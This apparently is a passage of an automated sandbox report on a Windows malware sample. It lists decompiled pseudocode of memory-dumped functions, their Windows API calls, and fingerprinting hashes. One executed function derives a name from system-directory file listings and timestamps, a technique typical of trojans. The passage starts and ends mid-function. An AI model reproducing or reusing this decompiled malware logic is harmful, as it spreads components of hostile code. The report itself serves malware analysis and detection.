                                                                                                                                                                                                                                                                                    					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                                                                                    					if(_t11 > 0) {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t6 =  *0xfca2c4; // 0x228
                                                                                                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t7 =  *0xfca290; // 0x3500000
                                                                                                                                                                                                                                                                                    				if(_t7 != 0) {
                                                                                                                                                                                                                                                                                    					HeapDestroy(_t7);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000228,00000001,00FC4214), ref: 00FC1552
                                                                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 00FC1561
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000228), ref: 00FC1582
                                                                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32(03500000), ref: 00FC1592
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4109453060-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 426b0947d2612a396f6add1dac0a8092f74bf85156c54142d2f60f75030a16f2
                                                                                                                                                                                                                                                                                    • Instruction ID: 5ade383997828fc790ed459ad99e6921c515af31fa0bc1f09dacd4413c183ae8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 426b0947d2612a396f6add1dac0a8092f74bf85156c54142d2f60f75030a16f2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F03031F8431E9BE7205B34AF0FF5A37ACBB56725B080918B81AD3191CB75D920B551
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                    			E00FC461D() {
                                                                                                                                                                                                                                                                                    				void* _v0;
                                                                                                                                                                                                                                                                                    				void** _t3;
                                                                                                                                                                                                                                                                                    				void** _t5;
                                                                                                                                                                                                                                                                                    				void** _t7;
                                                                                                                                                                                                                                                                                    				void** _t8;
                                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t3 =  *0xfca37c; // 0x38f9630
                                                                                                                                                                                                                                                                                    				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t5 =  *0xfca37c; // 0x38f9630
                                                                                                                                                                                                                                                                                    					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t7 =  *0xfca37c; // 0x38f9630
                                                                                                                                                                                                                                                                                    				_t10 =  *_t7;
                                                                                                                                                                                                                                                                                    				if(_t10 != 0 && _t10 != 0xfcb882) {
                                                                                                                                                                                                                                                                                    					HeapFree( *0xfca290, 0, _t10);
                                                                                                                                                                                                                                                                                    					_t7 =  *0xfca37c; // 0x38f9630
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				 *_t7 = _v0;
                                                                                                                                                                                                                                                                                    				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                                                                                                    				__imp__(_t8);
                                                                                                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(038F95F0), ref: 00FC4626
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,00FC2F44,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC4630
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,00FC2F44,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC465E
                                                                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(038F95F0), ref: 00FC4673
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6a472ea5824954c615931cd2c46e5b6675d0f2f16d40ccd9fae3876fc73ccd9e
                                                                                                                                                                                                                                                                                    • Instruction ID: 5b0553e26eaecdcb4b2b7c5ae5fcf81067ae11264846c62f2a55e896b39e869f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a472ea5824954c615931cd2c46e5b6675d0f2f16d40ccd9fae3876fc73ccd9e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F0D478644249DBEB288F34EF6BF15B7A4AB89715B068019E806C7364C772BC00FA15
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                    			E00FC2FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				int _t42;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t17 = __eax;
                                                                                                                                                                                                                                                                                    				_t37 = 0;
                                                                                                                                                                                                                                                                                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                                                                                    				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                                                                                    				_t28 = _t2;
                                                                                                                                                                                                                                                                                    				_t34 = E00FC5C4E(_t2);
                                                                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                                                                    					_t30 = E00FC5C4E(_t28);
                                                                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                                                                    						E00FC2A03(_t34);
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t39 = _a4;
                                                                                                                                                                                                                                                                                    						_t22 = E00FC79AC(_t39);
                                                                                                                                                                                                                                                                                    						_v8 = _t22;
                                                                                                                                                                                                                                                                                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                                                                                    							_a4 = _t39;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t26 = _t22 + 2;
                                                                                                                                                                                                                                                                                    							_a4 = _t22 + 2;
                                                                                                                                                                                                                                                                                    							_t22 = E00FC79AC(_t26);
                                                                                                                                                                                                                                                                                    							_v8 = _t22;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                                                                    							__imp__(_t34, _a4);
                                                                                                                                                                                                                                                                                    							 *_t30 = 0x2f;
                                                                                                                                                                                                                                                                                    							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t42 = _t22 - _a4;
                                                                                                                                                                                                                                                                                    							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                                                                                    							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                                                                                    							__imp__(_t30, _v8);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *_a8 = _t34;
                                                                                                                                                                                                                                                                                    						_t37 = 1;
                                                                                                                                                                                                                                                                                    						 *_a12 = _t30;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00FC56E5,00000000,00000000,00000000,038F9698,?,?,00FC3B82,?,038F9698), ref: 00FC3008
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC79AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00FC3036,00000000,00000001,00000001,?,?,00FC56E5,00000000,00000000,00000000,038F9698), ref: 00FC79BA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC79AC: StrChrA.SHLWAPI(?,0000003F,?,?,00FC56E5,00000000,00000000,00000000,038F9698,?,?,00FC3B82,?,038F9698,0000EA60,?), ref: 00FC79C4
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00FC56E5,00000000,00000000,00000000,038F9698,?,?,00FC3B82), ref: 00FC3066
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3076
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3082
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3767559652-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a50163c47f0c1720bae4f119d7a897eba2df18b55f535ff1c932966da87f12e1
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e5411bbe5006cb5f42c33db32c54c6dd96819243f1ad1e02c90db825854a840
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50163c47f0c1720bae4f119d7a897eba2df18b55f535ff1c932966da87f12e1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D721D57390421AAFCB119F74CD46FAA7FB8AF06394B058058F8059B211D775DA00E7A1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00FC4DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                                                                                    				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                                                                                    				_t18 = E00FC5C4E(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                                                                                    				_v8 = _t18;
                                                                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                                                                    					_t34 = _t29 + _t29;
                                                                                                                                                                                                                                                                                    					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                                                                                    					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                                                                                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,038F932C,?,00FC4ABB,004F0053,038F932C,?,?,?,?,?,?,00FC1BD5), ref: 00FC4DD8
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00FC4ABB,?,00FC4ABB,004F0053,038F932C,?,?,?,?,?,?,00FC1BD5), ref: 00FC4DDF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00FC4ABB,004F0053,038F932C,?,?,?,?,?,?,00FC1BD5), ref: 00FC4DFF
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(73B769A0,00FC4ABB,00000002,00000000,004F0053,73B769A0,?,?,00FC4ABB,004F0053,038F932C), ref: 00FC4E12
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2411391700-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 36f72e47f50908cb145552aba2d2e558456f892e4c7eb3442af62aca21925df0
                                                                                                                                                                                                                                                                                    • Instruction ID: 09f6b0077650b7eabf191ac5c153ce7cf66e20d9d4b00e2fe0d01a2b880fe0fc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36f72e47f50908cb145552aba2d2e558456f892e4c7eb3442af62aca21925df0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F04F32900119BFCF11EFA8CD46D9E7BACEF083547014066FD04D7102E775EA149BA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(038F887A,00000000,00000000,00000000,00FC6328,00000000), ref: 00FC2839
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 00FC2841
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,038F887A), ref: 00FC2855
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 00FC2860
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 74227042-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 52d8b1bdf8ce5dc49a0ff19780856fee38270624bd9c966b4a49aa617ff6ebc1
                                                                                                                                                                                                                                                                                    • Instruction ID: 19f3fe21342a05b29f2c1e70feef50e902108018a3d4edc4d87578fd930b5647
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52d8b1bdf8ce5dc49a0ff19780856fee38270624bd9c966b4a49aa617ff6ebc1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E09273905269A787119BB59D4DC9FBBACFF89761304041AFA00D3110C7659805ABA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                    			E00A74E9C(signed char* __eax, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				CHAR* _v20;
                                                                                                                                                                                                                                                                                    				struct _FILETIME _v28;
                                                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                                                                    				char* _v40;
                                                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                                                    				long _v344;
                                                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v368;
                                                                                                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				intOrPtr _t81;
                                                                                                                                                                                                                                                                                    				CHAR* _t83;
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    				signed char _t89;
                                                                                                                                                                                                                                                                                    				signed char _t91;
                                                                                                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                                                    				long _t99;
                                                                                                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                                                                                                    				char* _t111;
                                                                                                                                                                                                                                                                                    				void* _t113;
                                                                                                                                                                                                                                                                                    				int _t119;
                                                                                                                                                                                                                                                                                    				char _t128;
                                                                                                                                                                                                                                                                                    				void* _t134;
                                                                                                                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                                                                                                                    				char* _t139;
                                                                                                                                                                                                                                                                                    				signed int _t140;
                                                                                                                                                                                                                                                                                    				char* _t141;
                                                                                                                                                                                                                                                                                    				char* _t146;
                                                                                                                                                                                                                                                                                    				signed char* _t148;
                                                                                                                                                                                                                                                                                    				int _t151;
                                                                                                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                                                                                                    				void* _t153;
                                                                                                                                                                                                                                                                                    				void* _t154;
                                                                                                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                                                    				_t148 = __eax;
                                                                                                                                                                                                                                                                                    				_t72 =  *0xa7a2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    				_t74 = RtlAllocateHeap( *0xa7a290, 0, _t72 ^ 0x63699ac7);
                                                                                                                                                                                                                                                                                    				_v20 = _t74;
                                                                                                                                                                                                                                                                                    				if(_t74 == 0) {
                                                                                                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t76 =  *0xa7a2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    				_t78 = RtlAllocateHeap( *0xa7a290, 0, _t76 ^ 0x63699bce);
                                                                                                                                                                                                                                                                                    				_t146 = 0;
                                                                                                                                                                                                                                                                                    				_v36 = _t78;
                                                                                                                                                                                                                                                                                    				if(_t78 == 0) {
                                                                                                                                                                                                                                                                                    					L35:
                                                                                                                                                                                                                                                                                    					HeapFree( *0xa7a290, _t146, _v20);
                                                                                                                                                                                                                                                                                    					goto L36;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t136 =  *0xa7a2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                                                                                                                                                                                                                                                    				_t81 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    				_t154 = _t153 + 0xc;
                                                                                                                                                                                                                                                                                    				_t5 = _t81 + 0xa7b825; // 0x73797325
                                                                                                                                                                                                                                                                                    				_t83 = E00A71000(_t5);
                                                                                                                                                                                                                                                                                    				_v20 = _t83;
                                                                                                                                                                                                                                                                                    				if(_t83 == 0) {
                                                                                                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                                                                                                    					HeapFree( *0xa7a290, _t146, _v36);
                                                                                                                                                                                                                                                                                    					goto L35;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t134 = 0xffffffffffffffff;
                                                                                                                                                                                                                                                                                    				_v28.dwLowDateTime = 0x63699bce;
                                                                                                                                                                                                                                                                                    				_v28.dwHighDateTime = 0x63699bce;
                                                                                                                                                                                                                                                                                    				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                    				_v32 = _t85;
                                                                                                                                                                                                                                                                                    				if(_t85 != 0x63699bce) {
                                                                                                                                                                                                                                                                                    					GetFileTime(_t85,  &_v28, 0, 0);
                                                                                                                                                                                                                                                                                    					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                                                                                                                                                                                                                                                    					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                                                                                                                                                                                                                                                    					FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                                                                                                                                                                                                                                                    				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                                                                                                                                                                                                                                                    				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                                                                                                                                                                                                                                                    				 *_t148 = _t91;
                                                                                                                                                                                                                                                                                    				_v32 = _t91 & 0x000000ff;
                                                                                                                                                                                                                                                                                    				_t93 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    				_t16 = _t93 + 0xa7b846; // 0x642e2a5c
                                                                                                                                                                                                                                                                                    				_v40 = _t146;
                                                                                                                                                                                                                                                                                    				_v44 = _t89 & 0x000000ff;
                                                                                                                                                                                                                                                                                    				__imp__(_v20, _t16);
                                                                                                                                                                                                                                                                                    				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                                                                                                                                                                                                                                                    				_v16 = _t96;
                                                                                                                                                                                                                                                                                    				if(_t96 == _t134) {
                                                                                                                                                                                                                                                                                    					_t146 = 0;
                                                                                                                                                                                                                                                                                    					goto L34;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                                                                                                    				while(_t99 > 0) {
                                                                                                                                                                                                                                                                                    					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                                                                                                    					if(_t101 == 0) {
                                                                                                                                                                                                                                                                                    						FindClose(_v16);
                                                                                                                                                                                                                                                                                    						_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                                                                                                    						_v28.dwHighDateTime = _v344;
                                                                                                                                                                                                                                                                                    						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t109 = _v44;
                                                                                                                                                                                                                                                                                    					if(_v12 <= _t109) {
                                                                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t140 = _v12;
                                                                                                                                                                                                                                                                                    					if(_t140 > _v32) {
                                                                                                                                                                                                                                                                                    						_t141 = _v36;
                                                                                                                                                                                                                                                                                    						 *_a4 = _t141;
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							_t128 =  *_t141;
                                                                                                                                                                                                                                                                                    							if(_t128 == 0) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(_t128 < 0x30) {
                                                                                                                                                                                                                                                                                    								 *_t141 = _t128 + 0x20;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t141 = _t141 + 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v12 = 1;
                                                                                                                                                                                                                                                                                    						FindClose(_v16); // executed
                                                                                                                                                                                                                                                                                    						_t146 = 0;
                                                                                                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t165 = _t140 - _t109;
                                                                                                                                                                                                                                                                                    					L15:
                                                                                                                                                                                                                                                                                    					if(_t165 == 0 || _v12 == _v32) {
                                                                                                                                                                                                                                                                                    						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                                                                                                                                                                                                                                                    						_t139 = _v40;
                                                                                                                                                                                                                                                                                    						_t151 = _t111 -  &(_v368.cFileName);
                                                                                                                                                                                                                                                                                    						_t113 = 0;
                                                                                                                                                                                                                                                                                    						if(_t139 != 0) {
                                                                                                                                                                                                                                                                                    							_t48 = _t151 - 4; // -4
                                                                                                                                                                                                                                                                                    							_t113 = _t48;
                                                                                                                                                                                                                                                                                    							if(_t113 > _t151) {
                                                                                                                                                                                                                                                                                    								_t113 = 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t151 > 4) {
                                                                                                                                                                                                                                                                                    							_t151 = 4;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                                                                                                                                                                                                                                                    						_t154 = _t154 + 0xc;
                                                                                                                                                                                                                                                                                    						_v40 =  &(_v40[_t151]);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                                                                                                    						if(_t119 == 0) {
                                                                                                                                                                                                                                                                                    							FindClose(_v16);
                                                                                                                                                                                                                                                                                    							_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                                                                                                                                                                                                                                                    					_v12 = _v12 + 1;
